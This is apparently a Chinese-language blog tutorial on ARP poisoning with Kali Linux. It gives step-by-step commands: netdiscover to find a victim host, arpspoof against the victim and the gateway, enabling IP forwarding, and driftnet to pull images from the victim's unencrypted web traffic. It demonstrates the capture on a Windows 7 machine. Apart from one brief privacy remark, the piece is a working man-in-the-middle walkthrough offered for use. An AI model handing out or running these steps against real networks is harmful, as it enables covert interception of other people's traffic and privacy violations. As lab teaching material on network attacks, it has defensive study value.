什么是ARP协议？

（地址解析协议）：地址解析协议是一种通信协议，用于查询与给定互联网层地址(通常是IPv4地址)相关联的链路层地址(如MAC地址)。这种映射是Internet协议簇中的一个关键功能。
ARP中毒。

什么是ARP中毒？

地址解析协议中毒(ARP中毒)是一种攻击形式，攻击者通过使用伪造的ARP请求和应答数据包更改目标计算机的ARP缓存，从而更改媒体访问控制(MAC)地址并攻击以太网LAN。

Driftnet工具：Driftnet监视网络流量，抓取网络流量中的JPEG和GIF图像。这侵犯了人们的隐私，无论何时何地我们都不能这么做。除此之外，它还可以从网络中提取MPEG音频数据。
ARP中毒和在Kali Linux中使用Driftnet工具。
打开kali linux终端

扫描以查找网络(LAN)中的所有计算机。
输入命令：
netdiscover -r（ip范围）

结果：

192.168.243.1是网络IP。

192.168.243.2：默认网关。

192.168.243.254：广播IP。

仅剩下IP 192.168.243.129。
ping一下看看能不能通
收到响应之后，可以操作一下了
现在我们有了目标计算机的IP地址(192.168.243.129)。

现在我们可以执行ARP中毒。
命令：

arpspoof -i eth0 -t 192.168.243.129 192.168.243.2

这将禁用目标计算机中的Internet。

现在是端口转发的时候了，这样就不会有拒绝服务的情况。
命令：

检查端口转发是否启用。

cat /proc/sys/net/ipv4/ip_forward

如果结果为0则表示其关闭。

启用命令：

echo 1 > /proc/sys/net/ipv4/ip_forward

然后在目标计算机中进行ARP欺骗。

输入命令：

arpspoof -i eth0 -t 192.168.243.2 192.168.243.129

由于在目标计算机中启用了ARP欺骗。现在就是Driftnet大展身手的时候了。

driftnet -i eth0

您将得到一个名为driftnet的空白框。

这样你就成功了，可以获得目标计算机的图片。
在这里，我在Win7操作系统中搜索Pokemon图片。

攻击者将在他的Kali Linux机器屏幕上的driftnet终端中获得所有的图片。

这就是Arp中毒和Driftnet工具的工作原理。
注意Driftnet工具可用作中间人(MITM)攻击，但仅适用于端口80。

更多精彩等着你的到来！
Enjoy…. ☺☺☺☺☺☺☺☺